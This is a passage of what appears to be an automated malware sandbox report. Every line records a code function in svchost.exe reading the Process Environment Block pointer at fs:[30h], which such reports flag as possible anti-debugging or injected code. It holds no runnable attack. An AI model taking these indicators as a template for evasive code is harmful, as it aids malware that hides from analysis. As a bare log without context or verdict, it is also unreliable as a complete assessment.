Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]	1_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]	1_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	1_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]	1_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	1_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2C156 mov eax, dword ptr fs:[00000030h]	1_2_03B2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC8158 mov eax, dword ptr fs:[00000030h]	1_2_03BC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36154 mov eax, dword ptr fs:[00000030h]	1_2_03B36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36154 mov eax, dword ptr fs:[00000030h]	1_2_03B36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]	1_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]	1_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC4144 mov ecx, dword ptr fs:[00000030h]	1_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]	1_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]	1_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF60B8 mov eax, dword ptr fs:[00000030h]	1_2_03BF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]	1_2_03BF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B280A0 mov eax, dword ptr fs:[00000030h]	1_2_03B280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC80A8 mov eax, dword ptr fs:[00000030h]	1_2_03BC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3208A mov eax, dword ptr fs:[00000030h]	1_2_03B3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]	1_2_03B2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B720F0 mov ecx, dword ptr fs:[00000030h]	1_2_03B720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_03B2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B380E9 mov eax, dword ptr fs:[00000030h]	1_2_03B380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB60E0 mov eax, dword ptr fs:[00000030h]	1_2_03BB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB20DE mov eax, dword ptr fs:[00000030h]	1_2_03BB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC6030 mov eax, dword ptr fs:[00000030h]	1_2_03BC6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2A020 mov eax, dword ptr fs:[00000030h]	1_2_03B2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2C020 mov eax, dword ptr fs:[00000030h]	1_2_03B2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]	1_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]	1_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]	1_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]	1_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB4000 mov ecx, dword ptr fs:[00000030h]	1_2_03BB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]	1_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]	1_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]	1_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]	1_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]	1_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]	1_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]	1_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]	1_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5C073 mov eax, dword ptr fs:[00000030h]	1_2_03B5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B32050 mov eax, dword ptr fs:[00000030h]	1_2_03B32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB6050 mov eax, dword ptr fs:[00000030h]	1_2_03BB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B307AF mov eax, dword ptr fs:[00000030h]	1_2_03B307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE47A0 mov eax, dword ptr fs:[00000030h]	1_2_03BE47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD678E mov eax, dword ptr fs:[00000030h]	1_2_03BD678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B347FB mov eax, dword ptr fs:[00000030h]	1_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B347FB mov eax, dword ptr fs:[00000030h]	1_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]	1_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]	1_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]	1_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]	1_2_03BBE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB07C3 mov eax, dword ptr fs:[00000030h]	1_2_03BB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6273C mov eax, dword ptr fs:[00000030h]	1_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6273C mov ecx, dword ptr fs:[00000030h]	1_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6273C mov eax, dword ptr fs:[00000030h]	1_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAC730 mov eax, dword ptr fs:[00000030h]	1_2_03BAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C720 mov eax, dword ptr fs:[00000030h]	1_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C720 mov eax, dword ptr fs:[00000030h]	1_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30710 mov eax, dword ptr fs:[00000030h]	1_2_03B30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B60710 mov eax, dword ptr fs:[00000030h]	1_2_03B60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C700 mov eax, dword ptr fs:[00000030h]	1_2_03B6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B38770 mov eax, dword ptr fs:[00000030h]	1_2_03B38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30750 mov eax, dword ptr fs:[00000030h]	1_2_03B30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBE75D mov eax, dword ptr fs:[00000030h]	1_2_03BBE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72750 mov eax, dword ptr fs:[00000030h]	1_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72750 mov eax, dword ptr fs:[00000030h]	1_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB4755 mov eax, dword ptr fs:[00000030h]	1_2_03BB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6674D mov esi, dword ptr fs:[00000030h]	1_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6674D mov eax, dword ptr fs:[00000030h]	1_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6674D mov eax, dword ptr fs:[00000030h]	1_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B666B0 mov eax, dword ptr fs:[00000030h]	1_2_03B666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]	1_2_03B6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B34690 mov eax, dword ptr fs:[00000030h]	1_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B34690 mov eax, dword ptr fs:[00000030h]	1_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB06F1 mov eax, dword ptr fs:[00000030h]	1_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB06F1 mov eax, dword ptr fs:[00000030h]	1_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]	1_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E627 mov eax, dword ptr fs:[00000030h]	1_2_03B4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B66620 mov eax, dword ptr fs:[00000030h]	1_2_03B66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B68620 mov eax, dword ptr fs:[00000030h]	1_2_03B68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3262C mov eax, dword ptr fs:[00000030h]	1_2_03B3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72619 mov eax, dword ptr fs:[00000030h]	1_2_03B72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE609 mov eax, dword ptr fs:[00000030h]	1_2_03BAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]	1_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]	1_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]	1_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]	1_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]	1_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]	1_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]	1_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B62674 mov eax, dword ptr fs:[00000030h]	1_2_03B62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF866E mov eax, dword ptr fs:[00000030h]	1_2_03BF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF866E mov eax, dword ptr fs:[00000030h]	1_2_03BF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A660 mov eax, dword ptr fs:[00000030h]	1_2_03B6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A660 mov eax, dword ptr fs:[00000030h]	1_2_03B6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4C640 mov eax, dword ptr fs:[00000030h]	1_2_03B4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B545B1 mov eax, dword ptr fs:[00000030h]	1_2_03B545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B545B1 mov eax, dword ptr fs:[00000030h]	1_2_03B545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB05A7 mov eax, dword ptr fs:[00000030h]	1_2_03BB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB05A7 mov eax, dword ptr fs:[00000030h]	1_2_03BB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB05A7 mov eax, dword ptr fs:[00000030h]	1_2_03BB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E59C mov eax, dword ptr fs:[00000030h]	1_2_03B6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B32582 mov eax, dword ptr fs:[00000030h]	1_2_03B32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B32582 mov ecx, dword ptr fs:[00000030h]	1_2_03B32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B64588 mov eax, dword ptr fs:[00000030h]	1_2_03B64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B325E0 mov eax, dword ptr fs:[00000030h]	1_2_03B325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C5ED mov eax, dword ptr fs:[00000030h]	1_2_03B6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C5ED mov eax, dword ptr fs:[00000030h]	1_2_03B6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B365D0 mov eax, dword ptr fs:[00000030h]	1_2_03B365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]	1_2_03B6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]	1_2_03B6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E5CF mov eax, dword ptr fs:[00000030h]	1_2_03B6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E5CF mov eax, dword ptr fs:[00000030h]	1_2_03B6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]	1_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]	1_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]	1_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]	1_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]	1_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]	1_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]	1_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]	1_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]	1_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]	1_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]	1_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC6500 mov eax, dword ptr fs:[00000030h]	1_2_03BC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]	1_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]	1_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]	1_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]	1_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]	1_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]	1_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]	1_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6656A mov eax, dword ptr fs:[00000030h]	1_2_03B6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6656A mov eax, dword ptr fs:[00000030h]	1_2_03B6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6656A mov eax, dword ptr fs:[00000030h]	1_2_03B6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B38550 mov eax, dword ptr fs:[00000030h]	1_2_03B38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B38550 mov eax, dword ptr fs:[00000030h]	1_2_03B38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B644B0 mov ecx, dword ptr fs:[00000030h]	1_2_03B644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]	1_2_03BBA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B364AB mov eax, dword ptr fs:[00000030h]	1_2_03B364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEA49A mov eax, dword ptr fs:[00000030h]	1_2_03BEA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B304E5 mov ecx, dword ptr fs:[00000030h]	1_2_03B304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2E420 mov eax, dword ptr fs:[00000030h]	1_2_03B2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2E420 mov eax, dword ptr fs:[00000030h]	1_2_03B2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2E420 mov eax, dword ptr fs:[00000030h]	1_2_03B2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2C427 mov eax, dword ptr fs:[00000030h]	1_2_03B2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]	1_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]	1_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]	1_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]	1_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]	1_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]	1_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]	1_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B68402 mov eax, dword ptr fs:[00000030h]	1_2_03B68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B68402 mov eax, dword ptr fs:[00000030h]	1_2_03B68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B68402 mov eax, dword ptr fs:[00000030h]	1_2_03B68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5A470 mov eax, dword ptr fs:[00000030h]	1_2_03B5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5A470 mov eax, dword ptr fs:[00000030h]	1_2_03B5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5A470 mov eax, dword ptr fs:[00000030h]	1_2_03B5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBC460 mov ecx, dword ptr fs:[00000030h]	1_2_03BBC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEA456 mov eax, dword ptr fs:[00000030h]	1_2_03BEA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2645D mov eax, dword ptr fs:[00000030h]	1_2_03B2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5245A mov eax, dword ptr fs:[00000030h]	1_2_03B5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]	1_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]	1_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]	1_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]	1_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]	1_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]	1_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]	1_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]	1_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40BBE mov eax, dword ptr fs:[00000030h]	1_2_03B40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40BBE mov eax, dword ptr fs:[00000030h]	1_2_03B40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]	1_2_03BE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]	1_2_03BE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]	1_2_03B38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]	1_2_03B38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]	1_2_03B38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5EBFC mov eax, dword ptr fs:[00000030h]	1_2_03B5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]	1_2_03BBCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]	1_2_03BDEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]	1_2_03B50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]	1_2_03B50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]	1_2_03B50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]	1_2_03B30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]	1_2_03B30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]	1_2_03B30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5EB20 mov eax, dword ptr fs:[00000030h]	1_2_03B5EB20
